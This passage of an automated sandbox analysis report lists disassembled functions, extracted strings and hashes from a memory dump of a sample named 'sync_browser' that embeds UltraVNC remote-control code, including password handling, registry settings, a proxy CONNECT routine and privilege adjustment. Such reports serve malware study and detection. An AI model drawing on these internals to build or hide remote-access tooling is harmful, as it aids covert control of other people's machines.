                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: rand$Time_getptd$FileSystem
                                                                      • String ID: After DH: g=%I64u, m=%I64u, i=%I64u, key=%I64u$CheckUserGroupPasswordUni result=%i$interKey larger than maxNum
                                                                      • API String ID: 3485648590-3000200491
                                                                      • Opcode ID: 11d72f19a25ca50024aca8e18d0a2dbf4c1a378a4239df8fbec8ef93dcbcf261
                                                                      • Instruction ID: bd094e726b3e559d368c4f9001416e2551cbac68dbbb6e6469d99949cd93dae3
                                                                      • Opcode Fuzzy Hash: 11d72f19a25ca50024aca8e18d0a2dbf4c1a378a4239df8fbec8ef93dcbcf261
                                                                      • Instruction Fuzzy Hash: 53F11952B193D94AEB10D7B964202FD6FA09B82B85F944077EE9D9BB8ADD3CD100C721
                                                                      Function 00007FF7E5073A90 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 98COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ImageLoadModule$BitsCreateDeleteFileHandleName
                                                                      • String ID: ($DISPLAY$\background.bmp
                                                                      • API String ID: 3125945695-1422902838
                                                                      • Opcode ID: 5c990643eb74fd538b6b4e7c95b6f894b66b7c2a1e2628e0d5a9c6046c92dc90
                                                                      • Instruction ID: cad42ad438bbf11646b9be4f9fbaa51422f83ae4078c8567af31acd74653148d
                                                                      • Opcode Fuzzy Hash: 5c990643eb74fd538b6b4e7c95b6f894b66b7c2a1e2628e0d5a9c6046c92dc90
                                                                      • Instruction Fuzzy Hash: A7416A35708B8586E760AB24F46576BB3A0FF89B94FC01236DA9D83B98DF3CD0158B11
                                                                      Function 00007FF7E507C810 Relevance: 16.1, APIs: 4, Strings: 5, Instructions: 366networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: recv$send
                                                                      • String ID: CONNECT %s:%d HTTP/1.0$Location: $Proxy-Authenticate:$WWW-Authenticate:$basic
                                                                      • API String ID: 1963230611-4083095726
                                                                      • Opcode ID: d657ed37a6cae802db04decd52c8b9e56745bb5c9d23933e6423cb635756a354
                                                                      • Instruction ID: 069e16d1b3e8385e8cc743713fc058128ff7f399c3d2f8874560a62d9633cfa5
                                                                      • Opcode Fuzzy Hash: d657ed37a6cae802db04decd52c8b9e56745bb5c9d23933e6423cb635756a354
                                                                      • Instruction Fuzzy Hash: FBF1B421A0CB8A91E790B735A564379A791FB85F94FC44133EB4D83A99DE3CE542C322
                                                                      Function 00007FF7E50870B0 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 82libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Library$AddressCreateDisplayEnumFreeLoadProcSettings
                                                                      • String ID: DISPLAY$EnumDisplayDevicesA$USER32$mv video hook driver2
                                                                      • API String ID: 3702840025-1174184736
                                                                      • Opcode ID: d748da3611d51f35711ae867021bc229038fb3513b14e4069d6ed17d8080ad48
                                                                      • Instruction ID: 9e210c50128921aa1c94c48f159be8b43384a9e9e4f6eaca61b67faf586f22b0
                                                                      • Opcode Fuzzy Hash: d748da3611d51f35711ae867021bc229038fb3513b14e4069d6ed17d8080ad48
                                                                      • Instruction Fuzzy Hash: 4B31B8217096C695FB70EB25B865BAAB390FB89B44FC41136D98E87B48DF3CD105CB11
                                                                      Function 00007FF7E50C9A40 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 68registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: PrivateProfile$CloseFileModuleNameOpenQueryValue
                                                                      • String ID: NewMSLogon$Software\ORL\WinVNC3$UseRegistry$admin
                                                                      • API String ID: 771632046-3493897170
                                                                      • Opcode ID: 7e17a9a545862003f56dca8ab1949a50e46989200b9f0bc494998167346eab91
                                                                      • Instruction ID: 73199f1f3a442eb15e06ae4160b570d9b2b0ef60c0f6c76382df09320cca94dd
                                                                      • Opcode Fuzzy Hash: 7e17a9a545862003f56dca8ab1949a50e46989200b9f0bc494998167346eab91
                                                                      • Instruction Fuzzy Hash: D9316535A1CA4AC2EB60EB24F4653AAB360FB89B54FC01137E64D82658DF3DE105CB51
                                                                      Function 00007FF7E50818A0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 60COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Process$CloseHandleOpenToken$AdjustCurrentErrorLastLookupPrivilegePrivilegesValue
                                                                      • String ID: SeTcbPrivilege
                                                                      • API String ID: 2450735924-1502394177
                                                                      • Opcode ID: 049707e4f3f4a22454709a7697195c91078346b3f6d7fa6eb6f95c633ec379e6
                                                                      • Instruction ID: 882cbb8b3c2ed2b48f34ab6c6145b4e30f570bbb64050ef8714576b0cb49223b
                                                                      • Opcode Fuzzy Hash: 049707e4f3f4a22454709a7697195c91078346b3f6d7fa6eb6f95c633ec379e6
                                                                      • Instruction Fuzzy Hash: 07213561B18B8A82FB60AB61F42576AA3A0FF85F45F841036E94D87758EF7CD444CB11
                                                                      Function 00007FF7E512DF80 Relevance: 15.3, APIs: 10, Instructions: 292timeCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _errno$_get_daylight_invalid_parameter_noinfo$ByteCharMultiWidefree$ErrorFreeHeapInformationLastTimeZone___lc_codepage_func__wtomb_environ_amsg_exit_getptd_lock
                                                                      • String ID:
                                                                      • API String ID: 2532449802-0
                                                                      • Opcode ID: 8dacce8ed05afb912c218c2bfa4b7955afc0b41eb5700f84e9d69f6c384d718a
                                                                      • Instruction ID: 5ad80cc505e3af95db54ff16284329143261efd0e029e95cca61768f869de552
                                                                      • Opcode Fuzzy Hash: 8dacce8ed05afb912c218c2bfa4b7955afc0b41eb5700f84e9d69f6c384d718a
                                                                      • Instruction Fuzzy Hash: 94C1B436A0C28A85E720BF25B47177AB795BF45F40F804136DA8D8769ADF3CD8119722
                                                                      Function 00007FF7E513068C Relevance: 15.3, APIs: 10, Instructions: 255COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _get_daylight$_errno_isindst$__getgmtimebuf__tzset_invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 1457502553-0
                                                                      • Opcode ID: cbc433eb692454e3aa796801b86b425fca8be06b4507e2d40963ba8697586f4d
                                                                      • Instruction ID: f83810da7a6facb86d7a8ed3778bfd61c5b89aa08717e0edc93f132950a10dbe
                                                                      • Opcode Fuzzy Hash: cbc433eb692454e3aa796801b86b425fca8be06b4507e2d40963ba8697586f4d
                                                                      • Instruction Fuzzy Hash: EA91D8B2B0464E47EB58AF25E835779A3D5DB54B84F45803BDA0DCAB8DEE3CE5008711
                                                                      Function 00007FF7E5076060 Relevance: 14.4, APIs: 5, Strings: 3, Instructions: 354libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressInfoProcSystem$Version
                                                                      • String ID: @$GetNativeSystemInfo$GetVersionExA
                                                                      • API String ID: 4103462327-1183986914
                                                                      • Opcode ID: c077f823e49ebc5b331189c8cff37ce902c5a9973228b6b7ea9e339cd8702d33
                                                                      • Instruction ID: a86950d4223de19a96fdae07440be024bd8a2ecd4d44b6e1bc25cd1fa1a89361
                                                                      • Opcode Fuzzy Hash: c077f823e49ebc5b331189c8cff37ce902c5a9973228b6b7ea9e339cd8702d33
                                                                      • Instruction Fuzzy Hash: 7DF17572A0468589E750EF35D0603BDB7A0FB45F48F588036EE4E8B699DF38E545CB22
                                                                      Function 00007FF7E50951B7 Relevance: 12.6, APIs: 3, Strings: 4, Instructions: 399COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: DesktopOpen$ClipboardCloseInput
                                                                      • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                      • API String ID: 2872304593-3977938048
                                                                      • Opcode ID: 9a1397a3eef0d020bab29e7c55029324bfbb077e343b79cf4d75e8f6a3a4f479
                                                                      • Instruction ID: b95db02468adea9fa1c137b09ce4165ad4a5a436fdf4d9cccc78ebab306bb48f
                                                                      • Opcode Fuzzy Hash: 9a1397a3eef0d020bab29e7c55029324bfbb077e343b79cf4d75e8f6a3a4f479
                                                                      • Instruction Fuzzy Hash: E512E632A086C585E760EB39C8687FDA7A0EBC5F94F844136EA4D8B799CF38D441C321
                                                                      Function 00007FF7E50C78E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 75registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: PrivateProfileQueryValue$FileModuleNameString
                                                                      • String ID: UseRegistry$admin$admin_auth
                                                                      • API String ID: 3374479654-3376419731
                                                                      • Opcode ID: f1da5f48a8e78eea85e5e4b18c7d496972abace380fcf9454b174fc3425995f0
                                                                      • Instruction ID: 8c73b3a24bf9548c7e44d6b5bd8606ec62fb4d27386d38361394197b26685dcd
                                                                      • Opcode Fuzzy Hash: f1da5f48a8e78eea85e5e4b18c7d496972abace380fcf9454b174fc3425995f0
                                                                      • Instruction Fuzzy Hash: 08316631618A4681EB61AB21F8647AAF364FB89F84FC41137E98D87B58DF3CD504CB11
                                                                      Function 00007FF7E5091620 Relevance: 12.3, APIs: 5, Strings: 3, Instructions: 323COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called, xrefs: 00007FF7E509166F
                                                                      • unable to determine legacy authentication method, xrefs: 00007FF7E509173F
                                                                      • i, xrefs: 00007FF7E5091809
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CriticalSection_errnofreemalloc$AllocCurrentEnterHeapLeaveProcess_callnewhrand
                                                                      • String ID: i$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called$unable to determine legacy authentication method
                                                                      • API String ID: 2847437661-1576074771
                                                                      • Opcode ID: c943cd2ba047107cef663f8e316ffb6f847f0ddfb623d2f2043e74a738892daf
                                                                      • Instruction ID: 4d01dd7021978954a5cd0823bdfc8e6d8c91f2ab3eac797f2b4792a26656c74a
                                                                      • Opcode Fuzzy Hash: c943cd2ba047107cef663f8e316ffb6f847f0ddfb623d2f2043e74a738892daf
                                                                      • Instruction Fuzzy Hash: 36D1B422B0474685F714E739D4643BDA7A2EB85B64F944236EE2E877D9CF38D841C322
                                                                      Function 00007FF7E50C7650 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 47registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Create$FileModuleNamePrivateProfile
                                                                      • String ID: Software\UltraVNC$UseRegistry$admin$mslogon
                                                                      • API String ID: 27673491-2056936749
                                                                      • Opcode ID: 49ca59dd5d1ce4bd8261c69328d6c9401fd879975b581b5eca3f4e4a4bfb3057
